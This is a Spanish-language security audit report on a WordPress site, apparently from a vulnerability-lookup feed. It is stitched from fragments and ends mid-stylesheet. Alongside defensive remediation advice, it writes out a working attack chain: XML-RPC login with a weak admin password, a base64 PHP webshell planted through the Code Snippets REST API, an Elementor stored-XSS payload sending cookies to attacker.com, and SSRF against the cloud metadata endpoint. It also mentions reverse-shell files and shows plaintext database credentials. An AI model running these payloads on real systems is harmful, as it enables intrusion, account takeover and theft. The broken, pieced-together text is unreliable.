+ sticky post + p\u00e1gina est\u00e1tica con matrix rain / glitch effects\n      \n\u2193\n      \n\n7\nEscalada: 12 CVEs y t\u00e9cnicas probadas \u2192 bloqueadas por seccomp + AppArmor + ptrace_scope=3\n    \n  \n\n  \n\n    \nAlcance y Metodolog\u00eda\n    \n\n      \nObjetivo\nhttps://www.columtech.online \u2014 WordPress 7.0 + Elementor 4.0.2 + plugin Filester/elFinder\n      \nTipo\nCaja negra \u2192 caja gris (tras obtener credenciales) \u00b7 sin acceso previo a servidor\n      \nAutorizaci\u00f3n\nDominio propiedad del solicitante \u00b7 auditor\u00eda completa autorizada verbalmente\n      \nIdentificaci\u00f3n\nTodas las peticiones etiquetadas con User-Agent: c4sh3r y X-Bug-Bounty: c4sh3r\n      \nNo destructivo\nEl defacing fue demostrado y revertido. Ficheros de prueba eliminados. No se destruy\u00f3 ni borr\u00f3 informaci\u00f3n real del sitio.\n      \nHerramientas\ncurl, Python 3, LinPEAS, bore (tunnel), GCC, git (exploit repos), b\u00fasqueda web de CVEs en tiempo real\n    \n  \n\n  \n\n    \nResumen de Hallazgos\n    \n\n      IDSeveridadHallazgoComponente\n      \n        C-01Cr\u00edticoCredencial admin d\u00e9bil \u2014 acceso total v\u00eda XML-RPCWordPress \u00b7 XML-RPC\n        C-02Cr\u00edticoWebshell externa preexistente (WSO Mr.X)wp-loginizer.php\n        C-03Cr\u00edticoRCE como www-data v\u00eda Code Snippets pluginWordPress \u00b7 Code Snippets REST\n        H-01AltoXML-RPC expuesto \u2014 SSRF + credential oracle sin rate-limitxmlrpc.php\n        H-02AltoCVE-2026-6127 Elementor XSS almacenado v\u00eda REST APIElementor 4.0.2 \u2264 4.0.4\n        H-03AltoEnumeraci\u00f3n de usuarios por 4 v\u00edas sin rate-limitREST API \u00b7 wp-login \u00b7 lostpassword\n        H-04AltoNonce de plugin expuesto en REST sin autenticaci\u00f3nFilevue \u00b7 /wp/v2/pages/7\n        M-01MedioWordPress 7.0 / Elementor 4.0.2 \u2014 versiones desactualizadasCore + plugins\n        M-02MedioEmail de usuario deducible por Gravatar hash (SHA-256)REST 
API \u00b7 Gravatar\n        M-03MedioRecuperaci\u00f3n de contrase\u00f1a rota + oracle de usuariowp-login.php \u00b7 lostpassword\n        M-04Mediowp-cron.php accesible p\u00fablicamentewp-cron.php\n        L-01BajoCabeceras de seguridad ausentes (HSTS, X-Content-Type, Permissions-Policy)HTTP Headers \u00b7 Caddy\n        L-02BajoOrigen Apache/versi\u00f3n filtrado en respuestas 404Apache 2.4.66 \u00b7 Cloudflare bypass\n        L-03Bajoreadme.html accesible \u2014 divulgaci\u00f3n de versi\u00f3n WPWordPress Core\n        L-04BajoCVE-2026-24072 Apache 2.4.66 mod_rewrite htaccess readApache 2.4.66\n        I-01InfoContenedor Docker con hardening seccomp/AppArmor efectivoInfraestructura\n        I-02InfoDB creds en claro en variable de entorno del containerDocker env \u00b7 WORDPRESS_DB_*\n        I-03InfoKernel 6.8.0-117 vulnerable a CVE-2026-46333 pero bloqueado por seccompKernel \u00b7 pidfd_getfd\n      \n    \n  \n\n  \n\n    \nHallazgos Detallados\n\n    \n    \n\n      \n\n        C-01\n        Cr\u00edtico\n        Credencial de administrador d\u00e9bil \u2014 compromiso total v\u00eda XML-RPC\n      \n      \n\n        \nDescripci\u00f3n\n        \nLa cuenta de administrador marce ten\u00eda la contrase\u00f1a marce123. XML-RPC no implementa rate-limiting, permitiendo descubrirla mediante credential oracle con pocas decenas de intentos. 
Una vez autenticados, se obtuvo acceso total: lectura de opciones del sitio, creaci\u00f3n/edici\u00f3n de posts, subida de ficheros y instalaci\u00f3n de plugins.\n        \nPoC\n        \n# Descubrimiento de credenciales v\u00eda XML-RPC oracle\ncurl -X POST https://www.columtech.online/xmlrpc.php \\\n  -d '&amp;lt;?xml version=\"1.0\"?&amp;gt;&amp;lt;methodCall&amp;gt;\n       &amp;lt;methodName&amp;gt;wp.getUsersBlogs&amp;lt;/methodName&amp;gt;\n       &amp;lt;params&amp;gt;\n         &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;marce&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;\n         &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;marce123&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;\n       &amp;lt;/params&amp;gt;&amp;lt;/methodCall&amp;gt;'\n\n# Respuesta: isAdmin=1, blogName=Laboratorio\n# RESULTADO: acceso de administrador confirmado\n        \nImpacto\n        \n\n          \nAcceso completo al panel de administraci\u00f3n WordPress\n          \nInstalaci\u00f3n de plugins arbitrarios \u2192 RCE\n          \nLectura/escritura de todos los contenidos y usuarios\n          \nDefacing del sitio demostrado\n          \nSubida de ficheros al servidor\n        \n        \nRemediaci\u00f3n\n        \n# 1. Cambiar contrase\u00f1a inmediatamente (m\u00ednimo 20 chars, aleatoria)\n# 2. Deshabilitar XML-RPC si no se usa Jetpack/app m\u00f3vil\nadd_filter('xmlrpc_enabled', '__return_false');\n\n# 3. Alternativamente, bloquear en Caddy/Cloudflare\n# Cloudflare WAF rule: (http.request.uri.path eq \"/xmlrpc.php\") \u2192 Block\n      \n    \n\n    \n    \n\n      \n\n        C-02\n        Cr\u00edtico\n        Webshell externa preexistente \u2014 WSO Mr.X v2.5\n      \n      \n\n        \nDescripci\u00f3n\n        \nSe encontr\u00f3 /var/www/html/wp-loginizer.php (237 KB), una webshell WSO (\u00abWeb Shell by orb\u00bb) Mr.X BYPASS v2.5 completamente funcional. 
El fichero incluye un file manager con terminal, file editor, y un beacon de tracking que reporta la URL de cada visita a https://cdn.privdayz.com/images/logo.jpg. El sitio fue comprometido por un atacante externo antes de esta auditor\u00eda (posts de spam en ruso desde 2023).\n        \nPoC\n        \ncurl https://www.columtech.online/wp-loginizer.php\n# Responde con file manager completo (sin autenticaci\u00f3n adicional)\n# Contiene: terminal, editor de archivos, upload\n# BEACON: POST a cdn.privdayz.com con location.href del visitante\n        \nImpacto\n        \n\n          \nAtacante externo tiene acceso de shell activo como www-data\n          \nExfiltraci\u00f3n de datos de visitantes a servidor tercero (privdayz.com)\n          \nPosible pivoting a base de datos y archivos\n          \nRGPD/privacidad: beacon rastrea IPs de visitantes\n        \n        \nRemediaci\u00f3n\n        \n# URGENTE \u2014 eliminar el fichero inmediatamente\nrm /var/www/html/wp-loginizer.php\nrm /var/www/html/2ops.php     # file manager adicional\nrm /var/www/html/x.php        # webshell de auditor\u00eda (nuestro)\nrm /var/www/html/rs.php       # reverse shell de auditor\u00eda (nuestro)\nrm /var/www/html/rs2.php      # reverse shell de auditor\u00eda (nuestro)\n\n# Auditar TODOS los archivos modificados en los \u00faltimos 90 d\u00edas:\nfind /var/www/html -newer /var/www/html/wp-config.php -name \"*.php\" | sort\n      \n    \n\n    \n    \n\n      \n\n        C-03\n        Cr\u00edtico\n        RCE como www-data v\u00eda Code Snippets REST API\n      \n      \n\n        \nDescripci\u00f3n\n        \nCon acceso de administrador, se instal\u00f3 el plugin Code Snippets v\u00eda REST API autenticada (POST /wp/v2/plugins). El plugin expone una API REST que permite crear snippets PHP que se ejecutan en cada carga de p\u00e1gina. 
Se cre\u00f3 un snippet con webshell (shell_exec(base64_decode($_GET['c4sh3r']))) que ejecuta comandos arbitrarios como uid=33(www-data).\n        \nPoC\n        \n# Instalar plugin\ncurl -X POST https://columtech.online/index.php?rest_route=/wp/v2/plugins \\\n  -H \"X-WP-Nonce: $NONCE\" -H \"Cookie: $ADMIN_COOKIES\" \\\n  -d '{\"slug\":\"code-snippets\",\"status\":\"active\"}'\n\n# Crear snippet webshell\ncurl -X POST https://columtech.online/index.php?rest_route=/code-snippets/v1/snippets \\\n  -H \"X-WP-Nonce: $NONCE\" \\\n  -d '{\"code\":\"if(isset($_GET[\\\"c4sh3r\\\"])){die(shell_exec(base64_decode($_GET[\\\"c4sh3r\\\"])));}\", \"scope\":\"front-end\",\"active\":true}'\n\n# Ejecutar comando\ncurl \"https://columtech.online/?c4sh3r=$(echo -n 'id' | base64)\"\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n        \nImpacto\n        \n\n          \nEjecuci\u00f3n remota de comandos en el servidor\n          \nLectura de wp-config.php y credenciales de base de datos\n          \nEscritura en /var/www/html (filesystem del host)\n          \nDefacing del sitio completo\n          \nReverse shell interactiva al atacante demostrada\n        \n        \nRemediaci\u00f3n\n        \n# Eliminar plugin Code Snippets y snippet malicioso\n# Revisar y eliminar TODOS los plugins no esenciales\n# Cambiar credenciales admin PRIMERO (ver C-01)\n# Implementar WAF rule para bloquear par\u00e1metros ?c4sh3r=\n      \n    \n\n    \n    \n\n      \n\n        H-01\n        Alto\n        XML-RPC expuesto \u2014 SSRF confirmado + amplificaci\u00f3n de credential testing\n      \n      \n\n        \nDescripci\u00f3n\n        \nxmlrpc.php est\u00e1 habilitado con system.multicall disponible. El m\u00e9todo pingback.ping causa que el servidor realice peticiones HTTP salientes arbitrarias (SSRF). 
Se confirm\u00f3 que el servidor intenta alcanzar 169.254.169.254 (metadata cloud) y puede escanear puertos internos por diferencia de tiempos.\n        \nPoC\n        \n# SSRF \u2014 servidor hace fetch a URL controlada por atacante\ncurl -X POST https://columtech.online/xmlrpc.php \\\n  -d '&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;pingback.ping&amp;lt;/methodName&amp;gt;\n       &amp;lt;params&amp;gt;\n         &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;http://169.254.169.254/&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;\n         &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;https://columtech.online/?p=1&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;\n       &amp;lt;/params&amp;gt;&amp;lt;/methodCall&amp;gt;'\n\n# Resultado: 11.3s timeout \u2192 servidor alcanza metadata endpoint\n# Externo (example.com): 1.3s | Interno (localhost:80): 0.3s\n        \nImpacto\n        \n\n          \nSSRF: escaneo de puertos/servicios internos y metadata cloud\n          \nsystem.multicall: amplificaci\u00f3n de credential testing sin generar logs proporcionales\n          \nPingback abuse: DDoS contra terceros usando el servidor como amplificador\n        \n        \nRemediaci\u00f3n\n        \nadd_filter('xmlrpc_enabled', '__return_false');\n# O bloquear en Cloudflare/Caddy si se necesita para Jetpack\n      \n    \n\n    \n    \n\n      \n\n        H-02\n        Alto\n        CVE-2026-6127 \u2014 Elementor 4.0.2 Stored XSS v\u00eda REST API (form-encoded PATCH)\n      \n      \n\n        \nDescripci\u00f3n\n        \nElementor 4.0.2 es vulnerable a CVE-2026-6127 (CVSS 6.4). El campo _elementor_data se registra con show_in_rest sin sanitize_callback. 
Un atacante con rol Contributor+ puede enviar una petici\u00f3n PATCH form-encoded (no JSON) y la sanitizaci\u00f3n se salta completamente, almacenando JavaScript arbitrario que se ejecuta para cualquier visitante, incluyendo el administrador.\n        \nPoC\n        \ncurl -X PATCH https://columtech.online/index.php?rest_route=/wp/v2/posts/1 \\\n  -H \"Authorization: Basic $(echo -n 'contributor:pass' | base64)\" \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  --data-urlencode 'meta[_elementor_edit_mode]=builder' \\\n  --data-urlencode 'meta[_elementor_data]=[{\"elType\":\"widget\",\"widgetType\":\"html\",\"settings\":{\"html\":\"&amp;lt;svg/onload=fetch(\\\"//attacker.com/\\\"+document.cookie)&amp;gt;\"}}]'\n        \nImpacto\n        \n\n          \nXSS persistente \u2192 robo de session cookies del administrador\n          \nAccount takeover del administrador cuando visita la p\u00e1gina\n          \nCadena hacia defacing y RCE desde XSS (auto-crear admin v\u00eda fetch)\n        \n        \nRemediaci\u00f3n\n        \n# Actualizar Elementor a \u2265 4.0.5\n# Workaround: restringir rol Contributor a usuarios de confianza\n      \n    \n\n    \n    \n\n      \n\n        H-03\n        Alto\n        Enumeraci\u00f3n de usuarios admin por 4 v\u00edas sin rate-limit\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl username del administrador (marce) se obtiene por al menos 4 m\u00e9todos distintos, ninguno protegido por rate-limit ni captcha:\n        \nPoC\n        \n# M\u00e9todo 1: REST API bypass del filtro de Caddy\ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/users\"\n# [{\"id\":1,\"slug\":\"marce\",...},{\"id\":2,\"slug\":\"prueba\",...}]\n\n# M\u00e9todo 2: author redirect\ncurl -I \"https://columtech.online/?author=1\"\n# 301 \u2192 /author/marce/\n\n# M\u00e9todo 3: wp-login oracle (respuesta diferente seg\u00fan usuario)\n# v\u00e1lido: \"la contrase\u00f1a que has introducido para marce no es correcta\"\n# 
inv\u00e1lido: \"El nombre de usuario nope123 no est\u00e1 registrado\"\n\n# M\u00e9todo 4: lostpassword oracle\n# v\u00e1lido: \"no se pudo enviar el correo electr\u00f3nico\" (usuario S\u00cd existe)\n# inv\u00e1lido: \"no hay ninguna cuenta con ese nombre de usuario\"\n        \nRemediaci\u00f3n\n        \n# Restringir REST users a autenticados:\nadd_filter('rest_endpoints', function($ep){\n    if(isset($ep['/wp/v2/users'])) unset($ep['/wp/v2/users']);\n    return $ep;\n});\n# Unificar mensajes de error de wp-login y lostpassword\n# Bloquear ?author= redirect\n      \n    \n\n    \n    \n\n      \n\n        H-04\n        Alto\n        Nonce de plugin Filevue expuesto en REST API sin autenticaci\u00f3n\n      \n      \n\n        \nDescripci\u00f3n\n        \nLa p\u00e1gina \u00abClient Portal\u00bb (ID=7) contiene el formulario de login del plugin Filevue con un nonce WordPress (_wpnonce) embebido en el HTML renderizado. Este HTML es devuelto por la REST API GET /wp/v2/pages/7 sin autenticaci\u00f3n, exponiendo el nonce a cualquier atacante.\n        \nPoC\n        \ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/pages/7\" | \\\n  grep -o '_wpnonce\" value=\"[^\"]*\"'\n# _wpnonce\" value=\"ecd04e0712\"\n\n# El nonce permite enviar peticiones autenticadas a admin-post.php\n# sin estar logueado \u2014 usado para probar SQLi en filevue_client_login\n        \nRemediaci\u00f3n\n        \n# No embeber nonces en contenido REST p\u00fablico\n# Restringir /wp/v2/pages a usuarios autenticados o excluir p\u00e1gina Client Portal\n# Generar nonce en el lado cliente (JS) tras autenticaci\u00f3n\n      \n    \n\n    \n    \n\n      \n\n        M-01\n        Medio\n        Versiones desactualizadas \u2014 WordPress 7.0 / Elementor 4.0.2 / Apache 2.4.66\n      \n      \n\n        \nDescripci\u00f3n\n        \nElementor 4.0.2 es vulnerable a CVE-2026-6127 (parcheado en 4.0.5). 
Apache 2.4.66 es vulnerable a CVE-2026-23918 (RCE HTTP/2) y CVE-2026-24072 (read bypass via htaccess), ambos parcheados en 2.4.67. El meta generator expone versiones exactas.\n        \nRemediaci\u00f3n\n        \n# Actualizar Elementor: wp plugin update elementor\n# Actualizar Apache: apt-get upgrade apache2\n# Eliminar generator meta:\nremove_action('wp_head', 'wp_generator');\n# Eliminar readme.html y license.txt del webroot\n      \n    \n\n    \n    \n\n      \n\n        M-02\n        Medio\n        Email de usuario deducible por reverse Gravatar SHA-256\n      \n      \n\n        \nDescripci\u00f3n\n        \nLas URLs de avatar Gravatar incluyen el hash SHA-256 del email normalizado del usuario. El email de la cuenta prueba (prueba@gmail.com) fue deducido probando candidatos comunes contra el hash expuesto p\u00fablicamente en GET /wp/v2/users/2.\n        \nPoC\n        \nimport hashlib\nhash_target = \"913ef45dd4e1f647359a846bca8bffb8d25b22f2a79d34d71c9c90ef0eb53024\"\nfor email in [\"prueba@gmail.com\", ...]:\n    if hashlib.sha256(email.encode()).hexdigest() == hash_target:\n        print(\"MATCH:\", email)\n# MATCH: prueba@gmail.com\n        \nRemediaci\u00f3n\n        \n# Desactivar Gravatar en WordPress (usar avatar local)\n# O usar un email que no sea predecible para cuentas sensibles\n      \n    \n\n    \n    \n\n      \n\n        M-03\n        Medio\n        Recuperaci\u00f3n de contrase\u00f1a rota + oracle de usuario\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl formulario de recuperaci\u00f3n de contrase\u00f1a falla con el error \u00abno se pudo enviar el correo electr\u00f3nico\u00bb para usuarios v\u00e1lidos, y \u00abno hay ninguna cuenta\u00bb para usuarios inexistentes. Esto act\u00faa como or\u00e1culo de enumeraci\u00f3n. 
Adem\u00e1s, el correo no se env\u00eda, por lo que el reset es inoperable \u2014 impacto en disponibilidad y posible vector de host-header injection si se configura SMTP en el futuro.\n        \nRemediaci\u00f3n\n        \n# 1. Configurar SMTP (WP Mail SMTP o Mailgun)\n# 2. Unificar mensaje de error (no revelar si usuario existe)\n# 3. Fijar siteurl y home en wp-config.php para prevenir host-header injection\ndefine('WP_SITEURL', 'https://www.columtech.online');\ndefine('WP_HOME', 'https://www.columtech.online');\n      \n    \n\n    \n    \n\n      \n\n        M-04\n        Medio\n        wp-cron.php accesible p\u00fablicamente\n      \n      \n\n        \nDescripci\u00f3n\n        \nwp-cron.php devuelve HTTP 200 y puede ser llamado externamente. Permite amplificar la carga del servidor llam\u00e1ndolo en bucle, actuando como vector de DoS.\n        \nRemediaci\u00f3n\n        \n# En wp-config.php (solo impide que WP dispare el cron en cada carga de p\u00e1gina;\n# wp-cron.php sigue respondiendo 200 a cualquier cliente):\ndefine('DISABLE_WP_CRON', true);\n# En crontab del host, ejecutar el cron dentro del contenedor sin pasar por HTTP p\u00fablico:\n*/5 * * * * docker exec CONTENEDOR_WP php /var/www/html/wp-cron.php &amp;gt;/dev/null\n# Y cerrar el acceso externo en Caddy (comprobar despu\u00e9s que /wp-cron.php devuelve 403):\n@wpcron path /wp-cron.php\nrespond @wpcron 403\n      \n    \n\n    \n    \n\n      \n\n        L-01\n        Bajo\n        Cabeceras de seguridad HTTP ausentes\n      \n      \n\n        \nDescripci\u00f3n\n        \nFaltan Strict-Transport-Security (HSTS), X-Content-Type-Options: nosniff y Permissions-Policy. 
La CSP solo cubre frame-ancestors 'self'.\n        \nRemediaci\u00f3n\n        \n# En Caddy (Caddyfile):\nheader Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\nheader X-Content-Type-Options \"nosniff\"\nheader Permissions-Policy \"geolocation=(), microphone=(), camera=()\"\n      \n    \n\n    \n    \n\n      \n\n        L-02\n        Bajo\n        Divulgaci\u00f3n de origen Apache y versi\u00f3n en p\u00e1ginas 404\n      \n      \n\n        \nDescripci\u00f3n\n        \nLas p\u00e1ginas 404 generadas por Apache revelan: Apache/2.4.66 (Debian) Server at www.columtech.online Port 80 \u2014 versi\u00f3n exacta, distribuci\u00f3n y que escucha en puerto 80 sin TLS.\n        \nRemediaci\u00f3n\n        \n# En apache2.conf:\nServerTokens Prod\nServerSignature Off\n      \n    \n\n    \n    \n\n      \n\n        L-03\n        Bajo\n        readme.html accesible \u2014 divulgaci\u00f3n de versi\u00f3n WordPress\n      \n      \n\n        \nDescripci\u00f3n\n        \n/readme.html devuelve HTTP 200 y revela la versi\u00f3n exacta de WordPress. Facilita targeting con CVEs de versi\u00f3n espec\u00edfica.\n        \nRemediaci\u00f3n\n        \nrm /var/www/html/readme.html /var/www/html/license.txt\n      \n    \n\n    \n    \n\n      \n\n        L-04\n        Bajo\n        CVE-2026-24072 Apache 2.4.66 \u2014 htaccess mod_rewrite file read\n      \n      \n\n        \nDescripci\u00f3n\n        \nApache 2.4.66 es vulnerable a CVE-2026-24072: un usuario con acceso de escritura a .htaccess puede leer ficheros fuera de su directorio con los privilegios del proceso httpd. 
En este caso, www-data ya tiene ese acceso, pero el vector es relevante en escenarios multiusuario.\n        \nRemediaci\u00f3n\n        \n# Actualizar Apache a 2.4.67+\napt-get upgrade apache2\n      \n    \n\n    \n    \n\n      \n\n        I-01\n        Info\n        Hardening de contenedor Docker \u2014 seccomp + AppArmor + ptrace_scope=3\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl contenedor Docker presenta un perfil de hardening excepcional que bloque\u00f3 todos los CVEs de escalada de privilegios probados (12 t\u00e9cnicas distintas). Los syscalls AF_ALG, CLONE_NEWUSER, io_uring_setup y pidfd_getfd est\u00e1n bloqueados por seccomp. AppArmor docker-default bloquea escrituras a ficheros de sistema. ptrace_scope=3 impide toda inspecci\u00f3n de procesos. Este es el nivel de hardening correcto para workloads en producci\u00f3n.\n        \nCVEs probados y bloqueados\n        \nCVE-2026-31431 (Copy Fail)     \u2192 AF_ALG bloqueado por seccomp\nCVE-2026-43284 (Dirty Frag)    \u2192 CLONE_NEWUSER bloqueado\nCVE-2026-46300 (Fragnesia)     \u2192 CLONE_NEWUSER bloqueado\nCVE-2026-46333 (ssh-keysign)   \u2192 pidfd_getfd bloqueado\nio_uring exploits              \u2192 io_uring_setup bloqueado\nGameOver(lay)                  \u2192 CLONE_NEWUSER bloqueado\nCrackArmor                     \u2192 AppArmor FS inaccesible en container\nCVE-2026-27456 (mount TOCTOU)  \u2192 Sin /etc/fstab user,loop entries\ngpasswd shadow attack          \u2192 AppArmor bloquea escritura /etc/gshadow\n      \n    \n\n    \n    \n\n      \n\n        I-02\n        Info\n        Credenciales DB en texto claro en variables de entorno del container\n      \n      \n\n        \nDescripci\u00f3n\n        \nLas credenciales de MySQL est\u00e1n accesibles en texto claro v\u00eda /proc/self/environ para cualquier proceso del container (incluyendo www-data tras RCE):\n        
\nWORDPRESS_DB_HOST=wordpress_db:3306\nWORDPRESS_DB_USER=wp_user\nWORDPRESS_DB_PASSWORD=wp_password\nWORDPRESS_DB_NAME=wordpress\n        \nRemediaci\u00f3n\n        \n# Usar Docker secrets en lugar de env vars para credenciales\n# O montar fichero de config encriptado desde un secrets manager\n# Nota: el proceso PHP tiene que leer la credencial en claro igualmente (wp-config.php o\n# /run/secrets), as\u00ed que tras un RCE como www-data sigue siendo accesible; los secrets solo\n# la sacan de docker inspect y de /proc/*/environ. Complementar con un usuario MySQL con\n# privilegios m\u00ednimos sobre la BD wordpress y acceso de red a wordpress_db solo desde este\n# contenedor, y rotar wp_password ahora: la webshell de C-02 ya pod\u00eda leerla.\n      \n    \n\n    \n    \n\n      \n\n        I-03\n        Info\n        Kernel 6.8.0-117 vulnerable a CVE-2026-46333 (bloqueado por seccomp)\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl kernel 6.8.0-117-generic (compilado el 5 Mayo 2026) es anterior al fix de CVE-2026-46333 (publicado el 14 Mayo 2026). La vulnerabilidad permite leer /etc/shadow mediante una race condition en __ptrace_may_access() + pidfd_getfd. El seccomp del container bloquea el syscall pidfd_getfd (438), mitigando el exploit mientras se mantenga ese perfil seccomp. Se verific\u00f3 que el exploit p\u00fablico fall\u00f3 con \u00abno hit in 500 rounds\u00bb.\n        \nRemediaci\u00f3n\n        \n# Actualizar el kernel del host cuando est\u00e9 disponible el parche\n# El seccomp profile actual bloquea el exploit probado; deja de protegerlo si el contenedor\n# se lanza con un perfil distinto (p. ej. seccomp=unconfined)\n      \n    \n\n  \n\n  \n\n    \nPlan de Remediaci\u00f3n \u00b7 Prioridad\n    \n\n      HOY (cr\u00edtico): Cambiar contrase\u00f1a de marce (m\u00ednimo 20 chars). Eliminar wp-loginizer.php, 2ops.php y todos los ficheros de auditor\u00eda del webroot. Desactivar XML-RPC. Eliminar plugin Code Snippets y el snippet malicioso. Dado que la webshell externa (C-02) ya ten\u00eda ejecuci\u00f3n como www-data y acceso a las credenciales de BD (I-02): rotar wp_password y los salts (AUTH_KEY, etc.) de wp-config.php, lo que invalida todas las sesiones; revisar la lista de usuarios con rol administrator; y valorar reconstruir el contenedor desde una imagen limpia.\n    \n    \n\n      Esta semana: Actualizar Elementor a \u2265 4.0.5 (parchea CVE-2026-6127). Actualizar Apache a 2.4.67 (parchea CVE-2026-23918 y CVE-2026-24072). Auditar todos los archivos PHP modificados en los \u00faltimos 90 d\u00edas. Configurar SMTP y unificar mensajes de error de wp-login. Restringir REST API users a autenticados. A\u00f1adir cabeceras de seguridad HTTP.\n    \n    \n\n      Este mes: Implementar 2FA para el panel de administraci\u00f3n. Migrar credenciales DB a Docker secrets. Configurar DISABLE_WP_CRON y cron real del sistema. 
Implementar WAF en Cloudflare para xmlrpc.php y ?author=. Eliminar readme.html y establecer ServerTokens Prod.\n    \n  \n\n  \n\n    \nAnexo \u00b7 Comandos de verificaci\u00f3n post-remediaci\u00f3n\n    \nEjecutar estos comandos tras aplicar las correcciones para confirmar que los vectores est\u00e1n cerrados:\n    \n# C-01: XML-RPC deshabilitado\ncurl -s -X POST https://columtech.online/xmlrpc.php | grep -c \"XML-RPC server accepts\"\n# Esperado: 0\n\n# C-02: Webshells eliminadas\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/wp-loginizer.php\n# Esperado: 404\n\n# H-03: REST users requiere autenticaci\u00f3n\ncurl -s https://columtech.online/index.php?rest_route=/wp/v2/users | jq '.code'\n# Esperado: \"rest_forbidden\"\n\n# H-03: ?author= no revela usuario\ncurl -s -o /dev/null -w \"%{redirect_url}\" \"https://columtech.online/?author=1\"\n# Esperado: vac\u00edo o URL sin slug de usuario\n\n# L-01: HSTS presente\ncurl -sI https://columtech.online/ | grep -i strict-transport\n# Esperado: Strict-Transport-Security: max-age=...\n\n# L-03: readme.html eliminado\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/readme.html\n# Esperado: 404\n  \n\n\n\n\n\n  Auditor\u00eda realizada por c4sh3r \u00b7 Reporte generado el 2026-06-04\n  Todos los hallazgos fueron verificados en entorno real con autorizaci\u00f3n del propietario. Las pruebas de escritura (defacing, webshells) fueron limpiadas inmediatamente tras la verificaci\u00f3n. PII real redactada.\n\n\n\n\n", "creation_timestamp": "2026-06-03T23:46:41.000000Z"}</description>
      <content:encoded>{"uuid": "5d6554f7-d228-462b-abd3-3233cbf92ca0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/C4sh3R/1f99346b1086e7d358ff1be8f5be7a42", "content": "\n\n\n\n\n\nColumtech \u2014 Informe de Auditor\u00eda de Seguridad \u00b7 c4sh3r\n\n  :root {\n    --bg: #0b0d12;\n    --bg-2: #11151c;\n    --panel: #161b25;\n    --panel-2: #1d2330;\n    --border: #2a3142;\n    --text: #e6e9ef;\n    --text-dim: #99a2b3;\n    --accent: #ff4d6d;\n    --accent-2: #ffb86b;\n    --crit: #ff3d57;\n    --high: #ff8b3d;\n    --med:  #ffd84a;\n    --low:  #4ac6ff;\n    --info: #8c9fb0;\n    --ok: #3ddc97;\n    --code-bg: #0a0d14;\n    --mono: ui-monospace, \"JetBrains Mono\", \"Fira Code\", Menlo, Consolas, monospace;\n  }\n  * { box-sizing: border-box; }\n  html, body { margin: 0; padding: 0; background: var(--bg); color: var(--text);\n               font-family: -apple-system, BlinkMacSystemFont, \"Segoe UI\", Roboto, \"Helvetica Neue\", Arial, sans-serif;\n               line-height: 1.55; -webkit-font-smoothing: antialiased; }\n  a { color: var(--accent-2); text-decoration: none; }\n  a:hover { text-decoration: underline; }\n  .hero {\n    padding: 60px 40px 50px;\n    background:\n      radial-gradient(1200px 400px at 10% -10%, rgba(255,77,109,0.25), transparent 60%),\n      radial-gradient(900px 380px at 100% 0%, rgba(255,184,107,0.15), transparent 60%),\n      linear-gradient(180deg, #0e1219, #0b0d12);\n    border-bottom: 1px solid var(--border);\n  }\n  .hero-inner { max-width: 1100px; margin: 0 auto; }\n  .eyebrow {\n    display: inline-flex; align-items: center; gap: 8px;\n    font-family: var(--mono); font-size: 12px; letter-spacing: 0.15em;\n    text-transform: uppercase; color: var(--accent);\n    padding: 4px 10px; border: 1px solid rgba(255,77,109,0.35);\n    border-radius: 999px; background: 
rgba(255,77,109,0.08);\n  }\n  .hero h1 { font-size: 44px; line-height: 1.1; margin: 18px 0 10px; letter-spacing: -0.02em; }\n  .hero h1 .accent { color: var(--accent); }\n  .hero .sub { color: var(--text-dim); font-size: 17px; max-width: 720px; }\n  .meta { margin-top: 30px; display: grid; grid-template-columns: repeat(4, 1fr); gap: 14px; }\n  .meta .card { background: rgba(22,27,37,0.7); border: 1px solid var(--border); border-radius: 10px; padding: 14px 16px; }\n  .meta .card .k { font-size: 11px; text-transform: uppercase; letter-spacing: 0.12em; color: var(--text-dim); }\n  .meta .card .v { font-family: var(--mono); font-size: 14px; margin-top: 6px; word-break: break-all; }\n  .author-strip {\n    display: flex; align-items: center; gap: 14px; margin-top: 24px;\n    padding: 12px 16px; border: 1px dashed var(--border); border-radius: 10px;\n    background: rgba(255,255,255,0.02); font-family: var(--mono); font-size: 13px; color: var(--text-dim);\n  }\n  .author-strip strong { color: var(--accent); }\n  .container { max-width: 1100px; margin: 0 auto; padding: 40px; }\n  section { margin-bottom: 60px; }\n  h2 { font-size: 26px; margin: 0 0 18px; letter-spacing: -0.01em; display: flex; align-items: center; gap: 12px; }\n  h2::before { content: ''; width: 4px; height: 22px; background: var(--accent); border-radius: 2px; }\n  h3 { font-size: 19px; margin: 22px 0 10px; }\n  p { color: var(--text); }\n  p.dim { color: var(--text-dim); }\n  .stats { display: grid; grid-template-columns: repeat(5, 1fr); gap: 12px; margin-top: 10px; }\n  .stat { background: var(--panel); border: 1px solid var(--border); border-radius: 12px; padding: 18px; text-align: center; }\n  .stat .num { font-size: 32px; font-weight: 700; font-family: var(--mono); }\n  .stat .lbl { font-size: 12px; text-transform: uppercase; letter-spacing: 0.12em; color: var(--text-dim); margin-top: 6px; }\n  .stat.crit .num { color: var(--crit); } .stat.high .num { color: var(--high); }\n  .stat.med  .num { 
